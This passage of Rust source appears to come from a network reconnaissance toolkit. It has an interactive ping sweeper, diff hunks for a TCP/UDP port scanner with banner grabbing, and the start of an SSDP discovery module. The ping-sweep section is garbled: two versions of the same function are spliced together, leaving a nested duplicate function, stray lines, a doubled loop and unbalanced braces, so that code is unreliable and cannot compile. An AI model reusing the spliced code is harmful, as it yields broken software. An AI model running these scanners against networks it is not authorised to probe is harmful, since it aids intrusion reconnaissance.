prompt_u64("Probe timeout (seconds)", 3, Some(1), Some(60))?;
let concurrency =
prompt_usize("Max concurrent hosts", 100, Some(1), Some(10_000))?;
let verbose = prompt_yes_no("Verbose output (show down hosts/errors)?", false)?;
let methods = loop {
let mut methods = Vec::new();
if prompt_yes_no("Use ICMP ping (system ping/ping6)?", true)? {
methods.push(PingMethod::Icmp);
}
if prompt_yes_no("Use TCP connect probes?", false)? {
let default_ports = "80,443";
let port_input =
prompt_with_default("TCP ports (comma separated)", default_ports)?;
let ports = parse_ports(&port_input)?;
if ports.is_empty() {
println!("{}", " No valid ports provided.".yellow());
} else {
methods.push(PingMethod::Tcp { ports });
}
}
if methods.is_empty() {
println!("{}", "Select at least one method.".red().bold());
continue;
}
break methods;
};
println!(
"{}",
format!(
"\n[*] Targets: {} | Methods: {} | Concurrency: {} | Timeout: {}s",
targets.len(),
methods_summary(&methods),
concurrency,
timeout_secs
)
.bold()
);
Ok(PingConfig {
targets,
methods,
concurrency,
timeout_secs,
verbose,
})
}
fn load_targets_from_file(path: &str) -> Result<Vec<IpNet>> {
let file = File::open(path)
.with_context(|| format!("Failed to open target file '{}'", path))?;
let reader = BufReader::new(file);
let mut nets = Vec::new();
for (idx, line) in reader.lines().enumerate() {
let line = line?;
let mut content = line.split('#').next().unwrap_or("").trim().to_string();
if content.is_empty() {
continue;
}
content = content.replace(',', " ");
for token in content.split_whitespace() {
match parse_target(token) {
Ok(net) => nets.push(net),
Err(e) => {
eprintln!(
"{}",
format!(" [file:{}] skipped '{}': {}", idx + 1, token, e)
.yellow()
);
}
}
}
}
Ok(nets)
}
fn methods_summary(methods: &[PingMethod]) -> String {
methods
.iter()
.map(PingMethod::describe)
.collect::<Vec<_>>()
.join(", ")
}
async fn execute_ping_sweep(config: &PingConfig) -> Result<()> {
let mut host_set: HashSet<IpAddr> = HashSet::new();
for net in &config.targets {
for host in net.hosts() {
host_set.insert(host);
}
}
if host_set.is_empty() {
println!("{}", "No host addresses derived from supplied targets.".yellow());
return Ok(());
}
let mut hosts: Vec<IpAddr> = host_set.into_iter().collect();
hosts.sort();
let total_hosts = hosts.len();
println!(
"{}",
format!(
"\n[*] Beginning sweep of {} hosts using {} method(s)...",
total_hosts,
config.methods.len()
)
.bold()
);
let semaphore = Arc::new(Semaphore::new(config.concurrency));
let methods = Arc::new(config.methods.clone());
let timeout = Duration::from_secs(config.timeout_secs.max(1));
let verbose = config.verbose;
let success_counter = Arc::new(AtomicUsize::new(0));
let processed_counter = Arc::new(AtomicUsize::new(0));
let start_time = std::time::Instant::now();
/// Executes a ping sweep across the provided CIDR subnet
pub async fn execute_ping_sweep(target: &str) -> Result<()> {
// // Parse the target as CIDR (e.g., 192.168.1.0/24)
let net: IpNet = target.parse().context("Use CIDR notation like 192.168.1.0/24")?;
// // Collect all host IPs in the subnet
let hosts: Vec<IpAddr> = net.hosts().collect();
// // Use a semaphore to limit concurrency to 50
let semaphore = Arc::new(Semaphore::new(50));
let mut tasks = Vec::new();
for ip in hosts {
let sem = semaphore.clone();
let methods_clone = methods.clone();
let success_clone = success_counter.clone();
let processed_clone = processed_counter.clone();
let ip_str = ip.to_string();
tasks.push(tokio::spawn(async move {
let permit = match sem.acquire_owned().await {
Ok(p) => p,
Err(_) => return,
};
let ip_string = ip.to_string();
let mut successes = Vec::new();
for method in methods_clone.iter() {
match method.probe(&ip, timeout).await {
Ok(mut labels) => successes.append(&mut labels),
Err(err) => {
if verbose {
eprintln!(
"{}",
format!(
"[!] {} ({}) error: {}",
ip_string,
method.label(),
err
)
.yellow()
);
}
}
// // Limit concurrent pings using the semaphore
let _permit = sem.acquire_owned().await.unwrap();
// // Use "ping" for IPv4, "ping6" for IPv6
let cmd = if ip.is_ipv4() { "ping" } else { "ping6" };
let result = timeout(
Duration::from_secs(3),
Command::new(cmd)
.args(["-c", "1", "-W", "1", &ip_str])
.output(),
)
.await;
// // If ping succeeded, print that the host is up
if let Ok(Ok(out)) = result {
if out.status.success() {
println!("[+] Host {} is up", ip_str);
}
}
drop(permit);
let processed = processed_clone.fetch_add(1, Ordering::Relaxed) + 1;
// Progress indicator every 100 hosts or at completion
if processed % 100 == 0 || processed == total_hosts {
let elapsed = start_time.elapsed().as_secs();
let rate = if elapsed > 0 { (processed as u64) / elapsed } else { 0 };
print!(
"\r{}",
format!(
"[*] Progress: {}/{} hosts ({:.1}%) | Up: {} | Rate: {}/s",
processed,
total_hosts,
(processed as f64 / total_hosts as f64) * 100.0,
success_clone.load(Ordering::Relaxed),
rate
)
.dimmed()
);
io::stdout().flush().ok();
}
if !successes.is_empty() {
success_clone.fetch_add(1, Ordering::Relaxed);
println!(
"\r{}",
format!(
"[+] Host {} is up ({})",
ip_string,
successes.join(", ")
)
.green()
);
} else if verbose {
println!("\r{}", format!("[-] Host {} is down", ip_string).dimmed());
}
}));
}
for task in tasks {
let _ = task.await;
for t in tasks {
let _ = t.await;
}
// Clear progress line
print!("\r{}\r", " ".repeat(80));
io::stdout().flush().ok();
let up_hosts = success_counter.load(Ordering::Relaxed);
println!(
"{}",
format!(
"\n[*] Sweep complete: {}/{} hosts responded.",
up_hosts, total_hosts
)
.bold()
);
Ok(())
}
async fn icmp_probe(ip: &IpAddr, timeout: Duration) -> Result<Vec<String>> {
// Try to detect the OS and use appropriate ping command
let wait_secs = timeout.as_secs().max(1).to_string();
let ip_str = ip.to_string();
let (cmd, args_vec) = if ip.is_ipv4() {
// Try ping first, fallback to ping6 for IPv4 if ping doesn't exist
if which::which("ping").is_ok() {
("ping", vec!["-c", "1", "-W", &wait_secs, &ip_str])
} else if which::which("ping6").is_ok() {
("ping6", vec!["-c", "1", "-W", &wait_secs, &ip_str])
} else {
return Err(anyhow!("Neither 'ping' nor 'ping6' command found. Install ping utility."));
}
} else {
// IPv6
if which::which("ping6").is_ok() {
("ping6", vec!["-c", "1", "-W", &wait_secs, &ip_str])
} else if which::which("ping").is_ok() {
// Some systems use ping -6 for IPv6
("ping", vec!["-6", "-c", "1", "-W", &wait_secs, &ip_str])
} else {
return Err(anyhow!("Neither 'ping' nor 'ping6' command found. Install ping utility."));
}
};
let result = tokio::time::timeout(
timeout,
Command::new(cmd)
.args(args_vec)
.output(),
)
.await;
match result {
Ok(Ok(output)) => {
if output.status.success() {
Ok(vec!["ICMP".to_string()])
} else {
Ok(Vec::new())
}
}
Ok(Err(err)) => Err(anyhow!("Ping command failed: {}", err)),
Err(_) => Ok(Vec::new()),
}
}
async fn tcp_probe(ip: &IpAddr, ports: &[u16], timeout: Duration) -> Result<Vec<String>> {
// Probe ports in parallel for better performance
let mut tasks = Vec::new();
for port in ports {
let ip = *ip;
let port = *port;
let timeout = timeout;
tasks.push(tokio::spawn(async move {
let socket = SocketAddr::new(ip, port);
match tokio::time::timeout(timeout, TcpStream::connect(socket)).await {
Ok(Ok(_stream)) => {
// Connection successful - drop stream immediately
Some(format!("TCP/{}", port))
}
Ok(Err(_)) => None,
Err(_) => None,
}
}));
}
let mut successes = Vec::new();
for task in tasks {
if let Ok(Some(label)) = task.await {
successes.push(label);
}
}
Ok(successes)
}
fn prompt_line(message: &str, allow_empty: bool) -> Result<String> {
print!("{}", message.cyan().bold());
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let trimmed = input.trim().to_string();
if !allow_empty && trimmed.is_empty() {
return Err(anyhow!("Input cannot be empty."));
}
Ok(trimmed)
}
fn prompt_with_default(message: &str, default: &str) -> Result<String> {
print!(
"{}",
format!("{} [{}]: ", message, default).cyan().bold()
);
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let trimmed = input.trim();
if trimmed.is_empty() {
Ok(default.to_string())
} else {
Ok(trimmed.to_string())
}
}
fn prompt_yes_no(message: &str, default_yes: bool) -> Result<bool> {
let default_hint = if default_yes { "Y/n" } else { "y/N" };
loop {
print!(
"{}",
format!("{} [{}]: ", message, default_hint).cyan().bold()
);
io::stdout().flush()?;
let mut input = String::new();
io::stdin().read_line(&mut input)?;
let trimmed = input.trim().to_lowercase();
match trimmed.as_str() {
"" => return Ok(default_yes),
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("{}", "Please answer with 'y' or 'n'.".yellow()),
}
}
}
fn prompt_usize(
message: &str,
default: usize,
min: Option<usize>,
max: Option<usize>,
) -> Result<usize> {
loop {
let response = prompt_with_default(message, &default.to_string())?;
match response.parse::<usize>() {
Ok(value) => {
if let Some(minimum) = min {
if value < minimum {
println!(
"{}",
format!("Value must be >= {}", minimum).yellow()
);
continue;
}
}
if let Some(maximum) = max {
if value > maximum {
println!(
"{}",
format!("Value must be <= {}", maximum).yellow()
);
continue;
}
}
return Ok(value);
}
Err(_) => println!("{}", "Enter a valid positive integer.".yellow()),
}
}
}
fn prompt_u64(
message: &str,
default: u64,
min: Option<u64>,
max: Option<u64>,
) -> Result<u64> {
loop {
let response = prompt_with_default(message, &default.to_string())?;
match response.parse::<u64>() {
Ok(value) => {
if let Some(minimum) = min {
if value < minimum {
println!(
"{}",
format!("Value must be >= {}", minimum).yellow()
);
continue;
}
}
if let Some(maximum) = max {
if value > maximum {
println!(
"{}",
format!("Value must be <= {}", maximum).yellow()
);
continue;
}
}
return Ok(value);
}
Err(_) => println!("{}", "Enter a valid positive integer.".yellow()),
}
}
}
fn parse_ports(input: &str) -> Result<Vec<u16>> {
let mut ports = Vec::new();
for token in input.replace(',', " ").split_whitespace() {
match token.parse::<u16>() {
Ok(port) => ports.push(port),
Err(_) => {
println!(
"{}",
format!(" Skipping invalid port '{}'", token).yellow()
);
}
}
}
ports.sort_unstable();
ports.dedup();
Ok(ports)
}
+79 -425
View File
@@ -1,20 +1,17 @@
use anyhow::{Result, anyhow};
use colored::*;
use std::{
fs::File,
io::{self, Write, BufWriter},
net::{SocketAddr, ToSocketAddrs},
sync::{Arc, Mutex},
time::Instant,
};
use tokio::{
io::{AsyncReadExt, AsyncWriteExt},
net::{TcpStream, UdpSocket},
sync::Semaphore,
time::{timeout, Duration},
};
#[derive(Debug, Clone)]
#[derive(Debug)]
pub struct ScanSettings {
pub concurrency: usize,
pub timeout_secs: u64,
@@ -22,109 +19,17 @@ pub struct ScanSettings {
pub verbose: bool,
pub scan_udp_enabled: bool,
pub output_file: String,
pub port_range: PortRange,
}
#[derive(Debug, Clone)]
pub enum PortRange {
All,
Custom { start: u16, end: u16 },
Common,
Top1000,
}
impl PortRange {
fn get_ports(&self) -> Vec<u16> {
match self {
PortRange::All => (1..=65535).collect(),
PortRange::Custom { start, end } => (*start..=*end).collect(),
PortRange::Common => COMMON_PORTS.to_vec(),
PortRange::Top1000 => (1..=1000).collect(),
}
}
}
// Common ports list
const COMMON_PORTS: &[u16] = &[
21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445, 993, 995, 1723, 3306, 3389, 5900, 8080,
];
// Service detection map
fn get_service_name(port: u16) -> &'static str {
match port {
21 => "FTP",
22 => "SSH",
23 => "Telnet",
25 => "SMTP",
53 => "DNS",
80 => "HTTP",
110 => "POP3",
111 => "RPC",
135 => "MSRPC",
139 => "NetBIOS",
143 => "IMAP",
443 => "HTTPS",
445 => "SMB",
993 => "IMAPS",
995 => "POP3S",
1723 => "PPTP",
3306 => "MySQL",
3389 => "RDP",
5900 => "VNC",
8080 => "HTTP-Proxy",
_ => "",
}
}
/// Interactive config prompt
pub fn prompt_settings() -> Result<ScanSettings> {
println!("{}", "\n=== Port Scanner Configuration ===".cyan().bold());
// Port range selection
println!("\n{}", "Port Range Options:".yellow());
println!(" 1. All ports (1-65535)");
println!(" 2. Common ports (21, 22, 23, 25, 53, 80, 443, etc.)");
println!(" 3. Top 1000 ports");
println!(" 4. Custom range");
let range_choice = prompt_usize("Select option (1-4) [1]: ")?;
let port_range = match range_choice {
1 | 0 => PortRange::All,
2 => PortRange::Common,
3 => PortRange::Top1000,
4 => {
let start_val: usize = prompt_usize("Start port: ")?;
let end_val: usize = prompt_usize("End port: ")?;
if start_val > 65535 || start_val == 0 {
return Err(anyhow!("Start port must be between 1 and 65535"));
}
if end_val > 65535 || end_val == 0 {
return Err(anyhow!("End port must be between 1 and 65535"));
}
let start: u16 = start_val.try_into().map_err(|_| anyhow!("Invalid start port"))?;
let end: u16 = end_val.try_into().map_err(|_| anyhow!("Invalid end port"))?;
if start > end {
return Err(anyhow!("Start port must be <= end port"));
}
PortRange::Custom { start, end }
}
_ => PortRange::All,
};
let ports = port_range.get_ports();
println!("{}", format!("[*] Selected {} ports to scan", ports.len()).green());
Ok(ScanSettings {
concurrency: prompt_usize("Concurrency [100]: ").unwrap_or(100),
timeout_secs: prompt_usize("Timeout (in seconds) [3]: ").unwrap_or(3) as u64,
show_only_open: prompt_bool("Show only open ports? (y/n) [y]: ").unwrap_or(true),
verbose: prompt_bool("Verbose output? (y/n) [n]: ").unwrap_or(false),
scan_udp_enabled: prompt_bool("Include UDP scan? (y/n) [n]: ").unwrap_or(false),
output_file: prompt("Output filename [scan_results.txt]: ").unwrap_or_else(|_| "scan_results.txt".to_string()),
port_range,
concurrency: prompt_usize("Concurrency: ")?,
timeout_secs: prompt_usize("Timeout (in seconds): ")? as u64,
show_only_open: prompt_bool("Show only open ports? (y/n): ")?,
verbose: prompt_bool("Verbose output? (y/n): ")?,
scan_udp_enabled: prompt_bool("Include UDP scan? (y/n): ")?,
output_file: prompt("Output filename: ")?,
})
}
@@ -139,7 +44,6 @@ pub async fn run_interactive(target: &str) -> Result<()> {
settings.verbose,
settings.scan_udp_enabled,
&settings.output_file,
settings.port_range,
)
.await
}
@@ -154,284 +58,115 @@ pub async fn run_with_settings(
concurrency: usize,
timeout_secs: u64,
show_only_open: bool,
_verbose: bool,
verbose: bool,
scan_udp_enabled: bool,
output_file: &str,
port_range: PortRange,
) -> Result<()> {
let start_time = Instant::now();
// Resolve domain or IP
let (resolved_ip_str, resolved_ip) = resolve_target(target)?;
let semaphore = Arc::new(Semaphore::new(concurrency));
let file = Arc::new(Mutex::new(BufWriter::new(File::create(output_file)?)));
let ports = port_range.get_ports();
let total_ports = ports.len() * (1 + scan_udp_enabled as usize);
let stats = Arc::new(Mutex::new(ScanStats::new()));
let progress = Arc::new(Mutex::new(ProgressTracker::new(total_ports)));
println!("\n{}", format!("[*] Starting scan for target: {} (resolved: {})", target, resolved_ip_str).cyan().bold());
println!("{}", format!("[*] Scanning {} ports with concurrency: {}", total_ports, concurrency).cyan());
writeln!(file.lock().unwrap(), "Port Scan Results for {} ({})\n", target, resolved_ip_str)?;
let timestamp = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap()
.as_secs();
writeln!(file.lock().unwrap(), "Scan started at: {}\n", timestamp)?;
let mut tasks = vec![];
// TCP Scan
println!("{}", "\n[*] Starting TCP scan...".yellow());
let mut tcp_tasks = vec![];
for port in &ports {
println!("[*] Starting scan for target: {} (resolved: {})", target, resolved_ip_str);
writeln!(file.lock().unwrap(), "Scan Results for {} ({})\n", target, resolved_ip_str)?;
let progress_bar = Arc::new(Mutex::new(ProgressBar::new(65535 * (1 + scan_udp_enabled as usize))));
// TCP Scan loop
println!("[*] Starting TCP scan...");
for port in 1..=65535u16 {
let permit = semaphore.clone().acquire_owned().await?;
let file = file.clone();
let stats = stats.clone();
let progress = progress.clone();
let progress_bar = progress_bar.clone();
let ip = resolved_ip;
let ip_str = resolved_ip_str.clone();
let port = *port;
let handle = tokio::spawn(async move {
let _permit = permit;
let result = scan_tcp(&ip, port, timeout_secs).await;
let mut stats_guard = stats.lock().unwrap();
let mut progress_guard = progress.lock().unwrap();
if let Some((status, banner, service)) = result {
match status.as_str() {
"OPEN" => {
stats_guard.tcp_open += 1;
let service_name = if service.is_empty() { get_service_name(port) } else { &service };
let line = format!("[TCP] {}:{} ({}) => {}", ip_str, port, service_name, status.green());
if !show_only_open {
let _ = writeln!(file.lock().unwrap(), "{}", line);
if let Some((status, banner)) = scan_tcp(&ip, port, timeout_secs).await {
let line = format!("[TCP] {}:{} => {}", ip_str, port, status);
if status == "OPEN" || !show_only_open {
if !banner.is_empty() {
let _ = writeln!(file.lock().unwrap(), "{} | Banner: {}", line, banner);
if verbose {
println!("{} | Banner: {}", line, banner);
}
} else {
let _ = writeln!(file.lock().unwrap(), "{}", line);
if verbose {
println!("{}", line);
}
let output_line = if !banner.is_empty() {
format!("{} | Banner: {}", line, banner.trim().bright_black())
} else {
line
};
let _ = writeln!(file.lock().unwrap(), "{}", output_line);
println!("{}", output_line);
}
"CLOSED" => stats_guard.tcp_closed += 1,
"TIMEOUT" | "FILTERED" => stats_guard.tcp_filtered += 1,
_ => {}
}
}
progress_guard.increment(&start_time);
if progress_guard.should_print() {
progress_guard.print_progress();
}
progress_bar.lock().unwrap().increment();
});
tcp_tasks.push(handle);
tasks.push(handle);
}
// UDP Scan
let mut udp_tasks = vec![];
// UDP Scan loop
if scan_udp_enabled {
println!("{}", "\n[*] Starting UDP scan...".yellow());
for port in &ports {
println!("[*] Starting UDP scan...");
for port in 1..=65535u16 {
let permit = semaphore.clone().acquire_owned().await?;
let file = file.clone();
let stats = stats.clone();
let progress = progress.clone();
let progress_bar = progress_bar.clone();
let ip = resolved_ip;
let ip_str = resolved_ip_str.clone();
let port = *port;
let handle = tokio::spawn(async move {
let _permit = permit;
let result = scan_udp(&ip, port, timeout_secs).await;
let mut stats_guard = stats.lock().unwrap();
let mut progress_guard = progress.lock().unwrap();
if let Some(status) = result {
match status.as_str() {
"OPEN" => {
stats_guard.udp_open += 1;
let service_name = get_service_name(port);
let line = format!("[UDP] {}:{} ({}) => {}", ip_str, port, service_name, status.green());
if !show_only_open {
let _ = writeln!(file.lock().unwrap(), "{}", line);
}
let _ = writeln!(file.lock().unwrap(), "{}", line);
if let Some(status) = scan_udp(&ip, port, timeout_secs).await {
let line = format!("[UDP] {}:{} => {}", ip_str, port, status);
if status == "OPEN" || !show_only_open {
let _ = writeln!(file.lock().unwrap(), "{}", line);
if verbose {
println!("{}", line);
}
"CLOSED" => stats_guard.udp_closed += 1,
"FILTERED" => stats_guard.udp_filtered += 1,
_ => {}
}
}
progress_guard.increment(&start_time);
if progress_guard.should_print() {
progress_guard.print_progress();
}
progress_bar.lock().unwrap().increment();
});
udp_tasks.push(handle);
tasks.push(handle);
}
}
// Await all tasks
for task in tcp_tasks {
let _ = task.await;
}
for task in udp_tasks {
for task in tasks {
let _ = task.await;
}
let elapsed = start_time.elapsed();
let stats = stats.lock().unwrap();
// Print summary
println!("\n{}", "=== Scan Summary ===".cyan().bold());
println!("{}", format!("Scan duration: {:.2} seconds", elapsed.as_secs_f64()).green());
println!("\n{}", "TCP Ports:".yellow());
println!(" {} Open: {}", "".green(), stats.tcp_open.to_string().green().bold());
println!(" {} Closed: {}", "".red(), stats.tcp_closed);
println!(" {} Filtered/Timeout: {}", "~".yellow(), stats.tcp_filtered);
if scan_udp_enabled {
println!("\n{}", "UDP Ports:".yellow());
println!(" {} Open: {}", "".green(), stats.udp_open.to_string().green().bold());
println!(" {} Closed: {}", "".red(), stats.udp_closed);
println!(" {} Filtered: {}", "~".yellow(), stats.udp_filtered);
}
println!("\n{}", format!("[*] Results saved to {}", output_file).cyan());
// Write summary to file
writeln!(file.lock().unwrap(), "\n=== Scan Summary ===")?;
writeln!(file.lock().unwrap(), "Scan duration: {:.2} seconds", elapsed.as_secs_f64())?;
writeln!(file.lock().unwrap(), "\nTCP Ports:")?;
writeln!(file.lock().unwrap(), " Open: {}", stats.tcp_open)?;
writeln!(file.lock().unwrap(), " Closed: {}", stats.tcp_closed)?;
writeln!(file.lock().unwrap(), " Filtered/Timeout: {}", stats.tcp_filtered)?;
if scan_udp_enabled {
writeln!(file.lock().unwrap(), "\nUDP Ports:")?;
writeln!(file.lock().unwrap(), " Open: {}", stats.udp_open)?;
writeln!(file.lock().unwrap(), " Closed: {}", stats.udp_closed)?;
writeln!(file.lock().unwrap(), " Filtered: {}", stats.udp_filtered)?;
}
println!("[*] Scan complete. Results saved to {}", output_file);
Ok(())
}
/// === TCP Port Scanner with Enhanced Banner Grabbing ===
async fn scan_tcp(ip: &std::net::IpAddr, port: u16, timeout_secs: u64) -> Option<(String, String, String)> {
/// === TCP Port Scanner (Banner Grab) ===
async fn scan_tcp(ip: &std::net::IpAddr, port: u16, timeout_secs: u64) -> Option<(String, String)> {
let addr = SocketAddr::new(*ip, port);
match timeout(Duration::from_secs(timeout_secs), TcpStream::connect(addr)).await {
Ok(Ok(mut stream)) => {
// Try service-specific probes for better banner grabbing
let (banner, service) = grab_banner(&mut stream, port).await;
Some(("OPEN".into(), banner, service))
}
Ok(Err(_)) => Some(("CLOSED".into(), "".into(), "".into())),
Err(_) => Some(("TIMEOUT".into(), "".into(), "".into())),
}
}
/// Enhanced banner grabbing with service-specific probes
async fn grab_banner(stream: &mut TcpStream, port: u16) -> (String, String) {
let mut buf = [0u8; 2048];
// Try to read initial banner (works for FTP, SMTP, POP3, etc.)
match timeout(Duration::from_secs(2), stream.read(&mut buf)).await {
Ok(Ok(n)) if n > 0 => {
let banner = String::from_utf8_lossy(&buf[..n]).trim().to_string();
let service = detect_service_from_banner(&banner, port);
return (banner, service);
}
_ => {}
}
// Service-specific probes
match port {
80 | 8080 => {
// HTTP probe
if let Ok(_) = stream.write_all(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n").await {
if let Ok(Ok(n)) = timeout(Duration::from_secs(2), stream.read(&mut buf)).await {
if n > 0 {
let response = String::from_utf8_lossy(&buf[..n]);
if let Some(server) = extract_http_server(&response) {
return (response.trim().to_string(), format!("HTTP ({})", server));
}
return (response.trim().to_string(), "HTTP".into());
Ok(Ok(stream)) => {
let mut buf = [0u8; 1024];
// Try reading immediately if service gives banner (FTP, SMTP, HTTP, etc)
match timeout(Duration::from_secs(2), stream.readable()).await {
Ok(Ok(())) => match stream.try_read(&mut buf) {
Ok(n) if n > 0 => {
let banner = String::from_utf8_lossy(&buf[..n]).to_string();
Some(("OPEN".into(), banner))
}
}
_ => Some(("OPEN".into(), "".into())),
},
_ => Some(("OPEN".into(), "".into())),
}
}
443 => {
// HTTPS - can't easily probe without TLS, just return empty
return ("".into(), "HTTPS".into());
}
22 => {
// SSH - read SSH banner
if let Ok(Ok(n)) = timeout(Duration::from_secs(2), stream.read(&mut buf)).await {
if n > 0 {
let banner = String::from_utf8_lossy(&buf[..n]).trim().to_string();
return (banner, "SSH".into());
}
}
}
_ => {
// Try reading again for other services
if let Ok(Ok(n)) = timeout(Duration::from_secs(1), stream.read(&mut buf)).await {
if n > 0 {
let banner = String::from_utf8_lossy(&buf[..n]).trim().to_string();
let service = detect_service_from_banner(&banner, port);
return (banner, service);
}
}
}
}
("".into(), "".into())
}
fn detect_service_from_banner(banner: &str, port: u16) -> String {
let banner_lower = banner.to_lowercase();
if banner_lower.contains("ssh") {
"SSH".into()
} else if banner_lower.contains("ftp") {
"FTP".into()
} else if banner_lower.contains("smtp") {
"SMTP".into()
} else if banner_lower.contains("pop3") {
"POP3".into()
} else if banner_lower.contains("imap") {
"IMAP".into()
} else if banner_lower.contains("http") {
"HTTP".into()
} else if banner_lower.contains("mysql") {
"MySQL".into()
} else {
get_service_name(port).to_string()
Ok(Err(_)) => Some(("CLOSED".into(), "".into())),
Err(_) => Some(("TIMEOUT".into(), "".into())),
}
}
fn extract_http_server(response: &str) -> Option<String> {
for line in response.lines() {
if line.to_lowercase().starts_with("server:") {
return Some(line.split(':').nth(1).unwrap_or("").trim().to_string());
}
}
None
}
/// === UDP Port Scanner ===
/// === UDP Port Scanner (Stateless "Fire-and-Forget") ===
async fn scan_udp(ip: &std::net::IpAddr, port: u16, timeout_secs: u64) -> Option<String> {
// We bind to a random UDP port on localhost
let bind_addr = if ip.is_ipv4() { "0.0.0.0:0" } else { "[::]:0" };
let sock = match UdpSocket::bind(bind_addr).await {
Ok(s) => s,
@@ -439,14 +174,14 @@ async fn scan_udp(ip: &std::net::IpAddr, port: u16, timeout_secs: u64) -> Option
};
let target = SocketAddr::new(*ip, port);
let payload = b"\x00\x00\x10\x10";
let payload = b"\x00\x00\x10\x10"; // Random small packet
let _ = sock.send_to(payload, target).await;
// Set a timeout: if port is closed, we should get "Connection refused"
let mut buf = [0u8; 512];
match timeout(Duration::from_secs(timeout_secs), sock.recv_from(&mut buf)).await {
Ok(Ok((_len, _src))) => Some("OPEN".into()),
Ok(Err(_)) => Some("CLOSED".into()),
Err(_) => Some("FILTERED".into()),
Ok(Ok((_len, _src))) => Some("OPEN".into()), // Got a response!
Ok(Err(_)) => Some("CLOSED".into()), // ICMP port unreachable
Err(_) => Some("FILTERED".into()), // No response
}
}
@@ -454,6 +189,7 @@ async fn scan_udp(ip: &std::net::IpAddr, port: u16, timeout_secs: u64) -> Option
fn resolve_target(input: &str) -> Result<(String, std::net::IpAddr)> {
let cleaned = input.trim().trim_start_matches('[').trim_end_matches(']');
let addrs: Vec<_> = (cleaned, 0).to_socket_addrs()?.collect();
// Prefer IPv4, else fallback to first address
if let Some(addr) = addrs.iter().find(|a| a.is_ipv4()) {
Ok((addr.ip().to_string(), addr.ip()))
} else if let Some(addr) = addrs.first() {
@@ -465,7 +201,7 @@ fn resolve_target(input: &str) -> Result<(String, std::net::IpAddr)> {
/// === Prompt Utilities ===
fn prompt(message: &str) -> Result<String> {
print!("{}", message.cyan().bold());
print!("{}", message);
io::stdout().flush()?;
let mut buf = String::new();
io::stdin().read_line(&mut buf)?;
@@ -475,13 +211,10 @@ fn prompt(message: &str) -> Result<String> {
fn prompt_bool(message: &str) -> Result<bool> {
loop {
let input = prompt(message)?;
if input.is_empty() {
return Ok(false);
}
match input.to_lowercase().as_str() {
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("{}", "Please enter 'y' or 'n'.".yellow()),
_ => println!("Please enter 'y' or 'n'."),
}
}
}
@@ -489,105 +222,26 @@ fn prompt_bool(message: &str) -> Result<bool> {
fn prompt_usize(message: &str) -> Result<usize> {
loop {
let input = prompt(message)?;
if input.is_empty() {
return Err(anyhow!("Input required"));
}
if let Ok(n) = input.parse::<usize>() {
return Ok(n);
}
println!("{}", "Please enter a valid number.".yellow());
println!("Please enter a valid number.");
}
}
/// === Scan Statistics ===
struct ScanStats {
tcp_open: usize,
tcp_closed: usize,
tcp_filtered: usize,
udp_open: usize,
udp_closed: usize,
udp_filtered: usize,
}
impl ScanStats {
fn new() -> Self {
ScanStats {
tcp_open: 0,
tcp_closed: 0,
tcp_filtered: 0,
udp_open: 0,
udp_closed: 0,
udp_filtered: 0,
}
}
}
/// === Progress Tracker ===
struct ProgressTracker {
/// === Progress Bar Struct ===
struct ProgressBar {
total: usize,
current: usize,
last_print: usize,
start_time: Option<Instant>,
}
impl ProgressTracker {
impl ProgressBar {
fn new(total: usize) -> Self {
ProgressTracker {
total,
current: 0,
last_print: 0,
start_time: None,
}
ProgressBar { total, current: 0 }
}
fn increment(&mut self, start_time: &Instant) {
if self.start_time.is_none() {
self.start_time = Some(*start_time);
}
fn increment(&mut self) {
self.current += 1;
}
fn should_print(&self) -> bool {
let diff = self.current - self.last_print;
diff >= 100 || self.current == self.total
}
fn print_progress(&mut self) {
if self.current == 0 {
return;
if self.current % 1000 == 0 || self.current == self.total {
println!("[*] Progress: {}/{}", self.current, self.total);
}
let percentage = (self.current as f64 / self.total as f64) * 100.0;
let elapsed = self.start_time.map(|s| s.elapsed()).unwrap_or_default();
let rate = if elapsed.as_secs() > 0 {
self.current as f64 / elapsed.as_secs() as f64
} else {
0.0
};
let remaining = if rate > 0.0 {
(self.total - self.current) as f64 / rate
} else {
0.0
};
print!("\r{}", format!(
"[*] Progress: {}/{} ({:.1}%) | Rate: {:.0} ports/sec | ETA: {:.0}s",
self.current,
self.total,
percentage,
rate,
remaining
).cyan());
io::stdout().flush().unwrap();
if self.current == self.total {
println!();
}
self.last_print = self.current;
}
}
+33 -266
View File
@@ -1,142 +1,46 @@
use anyhow::{Context, Result};
use colored::*;
use anyhow::{Result};
use regex::Regex;
use std::collections::HashMap;
use std::io::Write;
use std::net::SocketAddr;
use tokio::net::UdpSocket;
use tokio::time::{timeout as tokio_timeout, Duration};
/// SSDP Search Target types
#[derive(Clone, Debug)]
enum SearchTarget {
RootDevice,
All,
Custom(String),
}
impl SearchTarget {
fn st_header(&self) -> &str {
match self {
SearchTarget::RootDevice => "upnp:rootdevice",
SearchTarget::All => "ssdp:all",
SearchTarget::Custom(st) => st,
}
}
}
use tokio::time::{timeout, Duration};
pub async fn run(target: &str) -> Result<()> {
let port = prompt_port().unwrap_or(1900);
let timeout_secs = prompt_timeout().unwrap_or(3);
let retries = prompt_retries().unwrap_or(1);
let verbose = prompt_verbose().unwrap_or(false);
let target = clean_ipv6_brackets(target);
// Validate target format
let _ = normalize_target(&target, port)
.with_context(|| format!("Failed to normalize target '{}'", target))?;
// Determine search targets
let search_targets = prompt_search_targets()?;
let addr = normalize_target(&target, port)?;
println!("{}", format!("[*] Sending SSDP M-SEARCH to {}:{}...", target, port).bold());
println!("[*] Sending SSDP M-SEARCH to {}...", addr);
let mut found_any = false;
for (idx, st) in search_targets.iter().enumerate() {
if search_targets.len() > 1 {
println!(
"{}",
format!("[*] Trying ST: {} ({}/{})", st.st_header(), idx + 1, search_targets.len())
.cyan()
);
}
for attempt in 1..=retries {
if retries > 1 {
println!(" [*] Attempt {}/{}", attempt, retries);
}
match send_ssdp_request(&target, port, st, Duration::from_secs(timeout_secs), verbose).await {
Ok(Some(response)) => {
found_any = true;
parse_ssdp_response(&response, &target, port, st.st_header());
break; // Success, no need to retry
}
Ok(None) => {
if verbose {
println!(" {} No response received", "[-]".dimmed());
}
}
Err(e) => {
if verbose {
